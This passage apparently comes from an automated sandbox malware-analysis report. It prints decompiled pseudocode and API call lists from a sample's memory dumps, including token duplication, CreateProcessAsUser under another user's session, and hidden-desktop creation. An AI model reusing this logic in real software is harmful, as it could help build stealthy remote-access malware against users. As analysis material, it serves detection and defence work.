					}
					CloseHandle(_v116.hThread);
					CloseHandle(_v116);
					goto L8;
				}
				return _t19;
			}













                                                                                                        0x70983769
                                                                                                        0x7098376a
                                                                                                        0x7098376f
                                                                                                        0x70983771
                                                                                                        0x70983778
                                                                                                        0x7098377e
                                                                                                        0x7098377f
                                                                                                        0x70983784
                                                                                                        0x70983785
                                                                                                        0x7098378d
                                                                                                        0x70983791
                                                                                                        0x70983798
                                                                                                        0x7098379a
                                                                                                        0x7098379a
                                                                                                        0x709837a4
                                                                                                        0x709837aa
                                                                                                        0x709837ab
                                                                                                        0x709837b7
                                                                                                        0x709837c5
                                                                                                        0x709837c9
                                                                                                        0x709837cf
                                                                                                        0x709837d0
                                                                                                        0x709837d5
                                                                                                        0x709837e0
                                                                                                        0x7098380b
                                                                                                        0x70983811
                                                                                                        0x70983815
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983833
                                                                                                        0x70983833
                                                                                                        0x7098383b
                                                                                                        0x7098383d
                                                                                                        0x7098383e
                                                                                                        0x7098383e
                                                                                                        0x00000000
                                                                                                        0x70983844
                                                                                                        0x7098382a
                                                                                                        0x70983831
                                                                                                        0x00000000
                                                                                                        0x70983831
                                                                                                        0x7098384b

                                                                                                        APIs
                                                                                                          • Part of subcall function 70983600: WTSEnumerateSessionsW.WTSAPI32(00000000,00000000,00000001,?,?,00000000,74B04F20,?,00000000,?,00000000,74B04F20), ref: 7098362E
                                                                                                          • Part of subcall function 70983600: WTSFreeMemory.WTSAPI32(?,00000000,?,00000008,?,?,00000000,74B04F20,?,00000000,?,00000000,74B04F20), ref: 7098368C
                                                                                                          • Part of subcall function 70983600: Sleep.KERNEL32(000001F4,00000000,?,00000008,?,?,00000000,74B04F20,?,00000000,?,00000000,74B04F20), ref: 7098369C
                                                                                                        • CreateEnvironmentBlock.USERENV ref: 70983791
                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 709837AB
                                                                                                        • StrChrW.SHLWAPI(7098C678,00000057,?,00000044,?,00000000), ref: 709837BF
                                                                                                        • RtlZeroMemory.NTDLL(?,00000010), ref: 709837D0
                                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000020,?,00000000,?,00000020,?,00000010,?,00000000), ref: 70983800
                                                                                                        • Sleep.KERNEL32(000001F4,?,00000000), ref: 7098380B
                                                                                                        • CloseHandle.KERNEL32(?,?,00000000), ref: 7098382A
                                                                                                        • CloseHandle.KERNEL32(00000020,?,00000000), ref: 70983831
                                                                                                        • DestroyEnvironmentBlock.USERENV(?), ref: 7098383E
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 70983844
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleMemory$BlockCreateEnvironmentSleepZero$DestroyEnumerateFreeProcessSessionsUser
                                                                                                        • String ID: $D
                                                                                                        • API String ID: 826248435-1196817373
                                                                                                        • Opcode ID: b1274c68f16adf4752f7a724e50c11a07ce076e84fba4e6a59123e56ee0dcdae
                                                                                                        • Instruction ID: 36eb2fd7b516ed40a44d65f8ed5d3c4e0f42c05adff4f7409e192c6ae65eba0f
                                                                                                        • Opcode Fuzzy Hash: b1274c68f16adf4752f7a724e50c11a07ce076e84fba4e6a59123e56ee0dcdae
                                                                                                        • Instruction Fuzzy Hash: AB2181B2518302AFD210DF64CC85F6F77A8AB84B44F10891CF681A73C1D774E8098BA3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098A5C0, Relevance: 21.1, APIs: 14, Instructions: 80threadsleepsynchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E7098A5C0(int _a4) {
				void* _v0;
				void* _v4;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t5;
				struct HDESK__* _t7;
				struct HDESK__* _t14;
				void* _t16;

				if( *0x7098f2ac < 6 ||  *0x7098f5f4 != 0 ||  *0x7098f5f8 == 0) {
					if(_a4 == 0) {
						return _t5;
					} else {
						_a4 = 1;
						_t7 = GetThreadDesktop(GetCurrentThreadId());
						 *0x7098f534 = _t7;
						if(_t7 != 0) {
							_t7 = CreateDesktopW(StrChrW(0x7098cad4, 0x54), 0, 0, 0, 0x10000000, 0);
							 *0x7098f530 = _t7;
							if(_t7 != 0) {
								_t16 = CreateThread(0, 0, E70989B10, _v0, 0, 0);
								if(_t16 != 0) {
									WaitForSingleObject(_t16, 0xffffffff);
									CloseHandle(_t16);
									Sleep(0xfa0);
								}
								_t14 =  *0x7098f530; // 0x0
								return CloseDesktop(_t14);
							}
						}
						return _t7;
					}
				} else {
					_push(__esi);
					__esi = StrChrW;
					_push(__edi);
					__eax = StrChrW(0x7098cad4, 0x54);
					__eax = CreateEventW(0, 1, 0, __eax);
					__edi = __eax;
					if(__edi == 0) {
						L12:
						_pop(__edi);
						_pop(__esi);
						return __eax;
					}
					if(GetLastError() == 0xb7) {
						__eax = CloseHandle(__edi);
						goto L12;
					}
					__eax = GetCurrentThreadId();
					__eax = GetThreadDesktop(__eax);
					__ebx = CloseHandle;
					 *0x7098f534 = __eax;
					if(__eax != 0) {
						__eax = StrChrW(0x7098cad4, 0x54);
						__eax = CreateDesktopW(__eax, 0, 0, 0, 0x10000000, 0);
						 *0x7098f530 = __eax;
						if(__eax != 0) {
							__eax = _v4;
							__esi = CreateThread(0, 0, E7098A180, _v4, 0, 0);
							if(__esi != 0) {
								WaitForSingleObject(__esi, 0xffffffff) = CloseHandle(__esi);
								Sleep(0xfa0);
							}
							__ecx =  *0x7098f530; // 0x0
							__eax = CloseDesktop(__ecx);
						}
					}
					__eax = CloseHandle(__edi);
					_pop(__edi);
					_pop(__esi);
					return __eax;
				}
			}












                                                                                                        0x7098a5c7
                                                                                                        0x7098a6b3
                                                                                                        0x7098a621
                                                                                                        0x7098a6b9
                                                                                                        0x7098a6b9
                                                                                                        0x7098a027
                                                                                                        0x7098a02d
                                                                                                        0x7098a034
                                                                                                        0x7098a051
                                                                                                        0x7098a057
                                                                                                        0x7098a05e
                                                                                                        0x7098a079
                                                                                                        0x7098a07d
                                                                                                        0x7098a082
                                                                                                        0x7098a089
                                                                                                        0x7098a094
                                                                                                        0x7098a094
                                                                                                        0x7098a09a
                                                                                                        0x00000000
                                                                                                        0x7098a0a7
                                                                                                        0x7098a05e
                                                                                                        0x7098a0a8
                                                                                                        0x7098a0a8
                                                                                                        0x7098a5e7
                                                                                                        0x7098a5e7
                                                                                                        0x7098a5e8
                                                                                                        0x7098a5ee
                                                                                                        0x7098a5f6
                                                                                                        0x7098a5ff
                                                                                                        0x7098a605
                                                                                                        0x7098a609
                                                                                                        0x7098a61f
                                                                                                        0x7098a61f
                                                                                                        0x7098a620
                                                                                                        0x00000000
                                                                                                        0x7098a620
                                                                                                        0x7098a616
                                                                                                        0x7098a619
                                                                                                        0x00000000
                                                                                                        0x7098a619
                                                                                                        0x7098a623
                                                                                                        0x7098a62a
                                                                                                        0x7098a630
                                                                                                        0x7098a636
                                                                                                        0x7098a63d
                                                                                                        0x7098a653
                                                                                                        0x7098a656
                                                                                                        0x7098a65c
                                                                                                        0x7098a663
                                                                                                        0x7098a665
                                                                                                        0x7098a67d
                                                                                                        0x7098a681
                                                                                                        0x7098a68d
                                                                                                        0x7098a694
                                                                                                        0x7098a694
                                                                                                        0x7098a69a
                                                                                                        0x7098a6a1
                                                                                                        0x7098a6a1
                                                                                                        0x7098a663
                                                                                                        0x7098a6a8
                                                                                                        0x7098a6ab
                                                                                                        0x7098a6ac
                                                                                                        0x7098a6ad
                                                                                                        0x7098a6ad

                                                                                                        APIs
                                                                                                        • StrChrW.SHLWAPI(7098CAD4,00000054,00000000,00000002,7098A769,00000001), ref: 7098A5F6
                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 7098A5FF
                                                                                                        • GetLastError.KERNEL32 ref: 7098A60B
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 7098A619
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 7098A623
                                                                                                        • GetThreadDesktop.USER32(00000000), ref: 7098A62A
                                                                                                        • StrChrW.SHLWAPI(7098CAD4,00000054,00000000,00000000,00000000,10000000,00000000), ref: 7098A653
                                                                                                        • CreateDesktopW.USER32 ref: 7098A656
                                                                                                        • CreateThread.KERNEL32 ref: 7098A677
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 7098A686
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 7098A68D
                                                                                                        • Sleep.KERNEL32(00000FA0), ref: 7098A694
                                                                                                        • CloseDesktop.USER32(00000000), ref: 7098A6A1
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 7098A6A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Close$CreateDesktopHandleThread$CurrentErrorEventLastObjectSingleSleepWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 2944326888-0
                                                                                                        • Opcode ID: dfaa598e95f5f178b650cb04a56bff42231b44ad4b8f0c229ff80c578c37a3c2
                                                                                                        • Instruction ID: 93febe63c2953cd138e13e0ea687fef5f58b2c96bbe71a7fde613ee45eb485e6
                                                                                                        • Opcode Fuzzy Hash: dfaa598e95f5f178b650cb04a56bff42231b44ad4b8f0c229ff80c578c37a3c2
                                                                                                        • Instruction Fuzzy Hash: B021C27366C301AFF3115B62DC9CF6E3668EB45B16F300129F602A63E4EB749841EA16
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004FAC95, Relevance: 18.2, APIs: 12, Instructions: 196networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 004FAC9C
                                                                                                          • Part of subcall function 004E3E4E: __EH_prolog3_catch.LIBCMT ref: 004E3E55
                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004EA1FF,00000004,004E8E44,0000002C,004E9245,?,?,?,00000000,?,?), ref: 004A17A0
                                                                                                        • WSACreateEvent.WS2_32 ref: 004FADDF
                                                                                                        • GetTickCount.KERNEL32 ref: 004FAE21
                                                                                                        • _memset.LIBCMT ref: 004FAEC7
                                                                                                        • _memset.LIBCMT ref: 004FAED8
                                                                                                        • _memset.LIBCMT ref: 004FAEE6
                                                                                                        • _memset.LIBCMT ref: 004FAEF4
                                                                                                        • _memset.LIBCMT ref: 004FAF4E
                                                                                                        • getsockname.WS2_32(?,?,00000001), ref: 004FAF64
                                                                                                        • htons.WS2_32(?), ref: 004FAF77
                                                                                                        • getpeername.WS2_32(?,?,00000001), ref: 004FAF9C
                                                                                                        • htons.WS2_32(?), ref: 004FAFA9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: _memset$htons$CountCreateCriticalEventH_prolog3H_prolog3_H_prolog3_catchInitializeSectionTickgetpeernamegetsockname
                                                                                                        • String ID:
                                                                                                        • API String ID: 89764119-0
                                                                                                        • Opcode ID: 8ccc23890a2cca4fe7c1b869878fec0a2494137a41e10af8b33d801e1eca5b81
                                                                                                        • Instruction ID: 5de91ca40e8986ea8d72e07e44106d3b24f1f471233fc1032e1678d532113df5
                                                                                                        • Opcode Fuzzy Hash: 8ccc23890a2cca4fe7c1b869878fec0a2494137a41e10af8b33d801e1eca5b81
                                                                                                        • Instruction Fuzzy Hash: 07A135B0801B45DED721DF7AC988BDAFBE4BF19300F50896EE1AE97291D7346604CB15
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709812E0, Relevance: 18.1, APIs: 12, Instructions: 96filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 50%
                                                                                                        			E709812E0(char* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v264;
				char _v288;
				char _v300;
				intOrPtr _v304;
				char _v308;
				long _v312;
				char* _t18;
				void* _t20;
				char* _t28;
				char* _t32;
				char* _t40;
				void* _t42;
				intOrPtr _t43;
				long* _t48;

				_t18 =  &_v300;
				_push(_t18);
				_push(0xffffffff);
				_push(E709810E0);
				_push(E709810D0);
				_push(E709810A0);
				_push(E70981070);
				_push(E70981000);
				_push(E70981050);
				_push(E70981030);
				_v312 = 0;
				L7098BFB6();
				_t40 = _t18;
				_t48 =  &(( &_v312)[9]);
				if(_t40 == 0) {
					return 0;
				} else {
					_t32 = _a4;
					_t20 = CreateFileA(_t32, 0xc0000000, 3, 0, 3, 0x80, 0);
					_t42 = _t20;
					if(_t42 != 0xffffffff) {
						_push( &_v288);
						_push(_t42);
						_push(_t40);
						L7098BFB0();
						_t48 =  &(_t48[3]);
						CloseHandle(_t42);
						if(_t20 != 0) {
							_t43 = _a12;
							if(_t43 != 0) {
								_v312 = GetTickCount();
								 *0x7098f2a0 = RtlRandom( &_v312);
							}
							lstrcpyA( &_v264, _t32);
							PathRemoveFileSpecA( &_v264);
							PathAddBackslashA( &_v264);
							_push( &_v308);
							_push(0);
							_push(E70981100);
							_push(0);
							_push( &_v264);
							_v304 = _a8;
							_v308 = _t43;
							_t28 = PathFindFileNameA(_t32);
							_push(_t28);
							_push(_t40);
							L7098BFAA();
							_t48 =  &(_t48[7]);
							_v312 = _t28;
						}
					}
					_push(_t40);
					L7098BFA4();
					return _v312;
				}
			}

















                                                                                                        0x709812e8
                                                                                                        0x709812ec
                                                                                                        0x709812ed
                                                                                                        0x709812ef
                                                                                                        0x709812f4
                                                                                                        0x709812f9
                                                                                                        0x709812fe
                                                                                                        0x70981303
                                                                                                        0x70981308
                                                                                                        0x7098130f
                                                                                                        0x70981314
                                                                                                        0x70981318
                                                                                                        0x7098131d
                                                                                                        0x7098131f
                                                                                                        0x70981324
                                                                                                        0x70981411
                                                                                                        0x7098132a
                                                                                                        0x7098132b
                                                                                                        0x70981343
                                                                                                        0x70981349
                                                                                                        0x7098134e
                                                                                                        0x70981359
                                                                                                        0x7098135a
                                                                                                        0x7098135b
                                                                                                        0x7098135c
                                                                                                        0x70981361
                                                                                                        0x70981367
                                                                                                        0x70981370
                                                                                                        0x70981372
                                                                                                        0x7098137b
                                                                                                        0x70981388
                                                                                                        0x70981392
                                                                                                        0x70981392
                                                                                                        0x7098139d
                                                                                                        0x709813a8
                                                                                                        0x709813b3
                                                                                                        0x709813c4
                                                                                                        0x709813c5
                                                                                                        0x709813c7
                                                                                                        0x709813cc
                                                                                                        0x709813d2
                                                                                                        0x709813d4
                                                                                                        0x709813d8
                                                                                                        0x709813dc
                                                                                                        0x709813e2
                                                                                                        0x709813e3
                                                                                                        0x709813e4
                                                                                                        0x709813e9
                                                                                                        0x709813ec
                                                                                                        0x709813ec
                                                                                                        0x70981370
                                                                                                        0x709813f0
                                                                                                        0x709813f1
                                                                                                        0x70981406
                                                                                                        0x70981406

                                                                                                        APIs
                                                                                                        • #20.CABINET(70981030,70981050,70981000,70981070,709810A0,709810D0,709810E0,000000FF,?,00000000,00000000), ref: 70981318
                                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 70981343
                                                                                                        • #21.CABINET(00000000,00000000,?,74B05520,?,?,?,?,?,?,?,00000000,00000000), ref: 7098135C
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,74B05520,?,?,?,?,?,?,?,00000000,00000000), ref: 70981367
                                                                                                        • GetTickCount.KERNEL32 ref: 7098137D
                                                                                                        • RtlRandom.NTDLL ref: 7098138C
                                                                                                        • lstrcpyA.KERNEL32(?,?,?,74B05520,?,?,?,?,?,?,?,00000000,00000000), ref: 7098139D
                                                                                                        • PathRemoveFileSpecA.SHLWAPI(?,?,74B05520,?,?,?,?,?,?,?,00000000,00000000), ref: 709813A8
                                                                                                        • PathAddBackslashA.SHLWAPI(?,?,74B05520,?,?,?,?,?,?,?,00000000,00000000), ref: 709813B3
                                                                                                        • PathFindFileNameA.SHLWAPI(?,?,00000000,70981100,00000000,?,?,74B05520,?,?,?,?,?,?,?,00000000), ref: 709813DC
                                                                                                        • #22.CABINET(00000000,00000000,?,74B05520,?,?,?,?,?,?,?,00000000,00000000), ref: 709813E4
                                                                                                        • #23.CABINET(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 709813F1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FilePath$BackslashCloseCountCreateFindHandleNameRandomRemoveSpecTicklstrcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 4034828233-0
                                                                                                        • Opcode ID: 2687fe44326256c6f683b577dcbbdf62df554a394834df2caa849e719cb9e5fa
                                                                                                        • Instruction ID: 61cdaa6f1c10b69bacbe237befb5956ebbfa88115377c6d7d488a4fa09b3c7a4
                                                                                                        • Opcode Fuzzy Hash: 2687fe44326256c6f683b577dcbbdf62df554a394834df2caa849e719cb9e5fa
                                                                                                        • Instruction Fuzzy Hash: DE31C7B2508341AFC2209F65CC84FAF7BACEBC5754F104A1DF999963D0E734A5058B93
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709853B0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 79threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 80%
                                                                                                        			E709853B0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v264;
				char _v272;
				intOrPtr _t11;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t27;
				char* _t28;
				void* _t33;

				_t28 =  &_v264;
				_t21 = _a12;
				_t25 = _a8;
				_t24 = 0;
				if(_t25 != 0 || _t21 != 0) {
					_t33 =  *0x7098f5bc - _t24; // 0x1
					if(_t33 != 0) {
						E70983850(StrChrW(0x7098c90c, 0x55), 0);
						_t28 =  &(_t28[8]);
					}
					if(_t25 == 0) {
						if(_t21 == 0) {
							goto L8;
						}
						goto L9;
					} else {
						_t11 =  *0x7098f62c; // 0x784250
						_push(0x52);
						_push(_t11);
						_push(StrChrA(0x7098ca94, 0x47));
						wsprintfA( &_v272, StrChrA(0x7098ca8c, 0x25));
						_t27 = OpenEventA(2, 0,  &_v264);
						if(_t27 == 0) {
							goto L10;
						} else {
							SetEvent(_t27);
							CloseHandle(_t27);
							return _t24;
						}
					}
				} else {
					L8:
					_push(0);
					_push(_a4);
					_t24 = E70985310();
					L9:
					CloseHandle(CreateThread(0, 0, E70982E50, 0, 0, 0));
					L10:
					return _t24;
				}
			}












                                                                                                        0x709853b0
                                                                                                        0x709853b7
                                                                                                        0x709853bf
                                                                                                        0x709853c7
                                                                                                        0x709853cb
                                                                                                        0x709853d5
                                                                                                        0x709853db
                                                                                                        0x709853ed
                                                                                                        0x709853f2
                                                                                                        0x709853f2
                                                                                                        0x709853f7
                                                                                                        0x7098545a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709853f9
                                                                                                        0x709853f9
                                                                                                        0x70985404
                                                                                                        0x70985406
                                                                                                        0x70985410
                                                                                                        0x70985420
                                                                                                        0x70985438
                                                                                                        0x7098543c
                                                                                                        0x00000000
                                                                                                        0x7098543e
                                                                                                        0x7098543f
                                                                                                        0x70985446
                                                                                                        0x70985457
                                                                                                        0x70985457
                                                                                                        0x7098543c
                                                                                                        0x7098545c
                                                                                                        0x7098545c
                                                                                                        0x70985463
                                                                                                        0x70985465
                                                                                                        0x7098546e
                                                                                                        0x70985470
                                                                                                        0x70985486
                                                                                                        0x7098548c
                                                                                                        0x70985497
                                                                                                        0x70985497

                                                                                                        APIs
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,00000000,00000000,00000000,?), ref: 709853E6
                                                                                                        • StrChrA.SHLWAPI(7098CA94,00000047,00784250,00000052,00000000,00000000,?), ref: 7098540E
                                                                                                        • StrChrA.SHLWAPI(7098CA8C,00000025,00000000), ref: 70985418
                                                                                                        • wsprintfA.USER32 ref: 70985420
                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 70985432
                                                                                                        • SetEvent.KERNEL32(00000000), ref: 7098543F
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 70985446
                                                                                                        • CreateThread.KERNEL32 ref: 7098547F
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 70985486
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseEventHandle$CreateOpenThreadwsprintf
                                                                                                        • String ID: PBx
                                                                                                        • API String ID: 1587369599-258745131
                                                                                                        • Opcode ID: f156544d39eaf695de26d7547a81ace25db1b7e38e363f4b5254c77e5169ba6a
                                                                                                        • Instruction ID: 355788d17e40d58613c98a11c355c9b829981899c719d16afeddaea614ed5413
                                                                                                        • Opcode Fuzzy Hash: f156544d39eaf695de26d7547a81ace25db1b7e38e363f4b5254c77e5169ba6a
                                                                                                        • Instruction Fuzzy Hash: 0021D5B3B583107BD72057A58C4AF9E37689B84B12F104125FF45EB3D1DAB568098AA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70983600, Relevance: 16.6, APIs: 11, Instructions: 134sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 72%
                                                                                                        			E70983600() {
				void* _t32;
				void* _t33;
				void* _t35;
				void* _t53;
				void* _t55;
				void* _t58;
				void* _t59;
				void* _t61;
				void* _t64;
				void* _t65;

				_t59 =  *(_t65 + 0x20);
				 *(_t65 + 0x10) = 0;
				_t64 = 0;
				do {
					 *(_t65 + 0x20) = 0;
					 *(_t65 + 0x14) = 0;
					if(_t59 != 0xffffffff) {
						_push(_t65 + 0x14);
						_t32 = _t65 + 0x24;
						_push(_t32);
						_push(8);
						_push(_t59);
						_push(0);
						L7098BF80();
						if(_t32 == 0) {
							goto L14;
						} else {
							_t35 =  *(_t65 + 0x20);
							if( *_t35 == 0) {
								 *(_t65 + 0x10) = 1;
							}
							_push(_t35);
							goto L13;
						}
					} else {
						_t33 = _t65 + 0x14;
						_push(_t33);
						_push(_t65 + 0x24);
						_push(1);
						_push(0);
						_push(0);
						L7098BF86();
						if(_t33 == 0) {
							goto L14;
						} else {
							_t55 =  *(_t65 + 0x14);
							_t61 =  *(_t65 + 0x20);
							_t53 = 0;
							_t35 = _t61;
							if(_t55 <= 0) {
								L8:
								_push(_t61);
							} else {
								while( *((intOrPtr*)(_t35 + 8)) != 0) {
									_t53 = _t53 + 1;
									_t35 = _t35 + 0xc;
									if(_t53 < _t55) {
										continue;
									} else {
										_push(_t61);
									}
									goto L13;
								}
								_t59 =  *_t35;
								 *(_t65 + 0x10) = 1;
								goto L8;
							}
							L13:
							L7098BF7A();
							if( *(_t65 + 0x10) != 0) {
								_push(_t65 + 0x14);
								_push(_t59);
								 *((intOrPtr*)(_t65 + 0x1c)) = 0;
								L7098BF74();
								if(_t35 == 0) {
									break;
								} else {
									 *((intOrPtr*)(_t65 + 0x38)) = 0;
									if(DuplicateTokenEx( *(_t65 + 0x14), 0x2000000, 0, 1, 1, _t65 + 0x20) == 0) {
										break;
									} else {
										_push(4);
										_push(_t65 + 0x14);
										 *(_t65 + 0x20) = 0;
										L7098BF02();
										if(GetTokenInformation( *(_t65 + 0x20), 0x13, _t65 + 0x18, 4, _t65 + 0x18) != 0) {
											CloseHandle( *(_t65 + 0x20));
											CloseHandle( *(_t65 + 0x14));
											return  *(_t65 + 0x10);
										} else {
											_t58 =  *(_t65 + 0x20);
											 *(_t65 + 0x14) = _t58;
											CloseHandle( *(_t65 + 0x14));
											return _t58;
										}
									}
								}
							} else {
								goto L14;
							}
						}
					}
					L21:
					L14:
					Sleep(0x1f4);
					_t64 = _t64 + 1;
				} while (_t64 < 0x78);
				return 0;
				goto L21;
			}













                                                                                                        0x70983609
                                                                                                        0x7098360d
                                                                                                        0x70983611
                                                                                                        0x70983613
                                                                                                        0x70983613
                                                                                                        0x70983617
                                                                                                        0x7098361e
                                                                                                        0x70983668
                                                                                                        0x70983669
                                                                                                        0x7098366d
                                                                                                        0x7098366e
                                                                                                        0x70983670
                                                                                                        0x70983671
                                                                                                        0x70983672
                                                                                                        0x70983679
                                                                                                        0x00000000
                                                                                                        0x7098367b
                                                                                                        0x7098367b
                                                                                                        0x70983681
                                                                                                        0x70983683
                                                                                                        0x70983683
                                                                                                        0x7098368b
                                                                                                        0x00000000
                                                                                                        0x7098368b
                                                                                                        0x70983620
                                                                                                        0x70983620
                                                                                                        0x70983624
                                                                                                        0x70983629
                                                                                                        0x7098362a
                                                                                                        0x7098362c
                                                                                                        0x7098362d
                                                                                                        0x7098362e
                                                                                                        0x70983635
                                                                                                        0x00000000
                                                                                                        0x70983637
                                                                                                        0x70983637
                                                                                                        0x7098363b
                                                                                                        0x7098363f
                                                                                                        0x70983641
                                                                                                        0x70983645
                                                                                                        0x70983661
                                                                                                        0x70983661
                                                                                                        0x70983647
                                                                                                        0x70983647
                                                                                                        0x7098364c
                                                                                                        0x7098364d
                                                                                                        0x70983652
                                                                                                        0x00000000
                                                                                                        0x70983654
                                                                                                        0x70983654
                                                                                                        0x70983654
                                                                                                        0x00000000
                                                                                                        0x70983652
                                                                                                        0x70983657
                                                                                                        0x70983659
                                                                                                        0x00000000
                                                                                                        0x70983659
                                                                                                        0x7098368c
                                                                                                        0x7098368c
                                                                                                        0x70983695
                                                                                                        0x709836ba
                                                                                                        0x709836bb
                                                                                                        0x709836bc
                                                                                                        0x709836c0
                                                                                                        0x709836c7
                                                                                                        0x00000000
                                                                                                        0x709836c9
                                                                                                        0x709836dd
                                                                                                        0x709836e9
                                                                                                        0x00000000
                                                                                                        0x709836eb
                                                                                                        0x709836eb
                                                                                                        0x709836f1
                                                                                                        0x709836f2
                                                                                                        0x709836f6
                                                                                                        0x7098371c
                                                                                                        0x7098373e
                                                                                                        0x70983749
                                                                                                        0x70983754
                                                                                                        0x7098371e
                                                                                                        0x7098371e
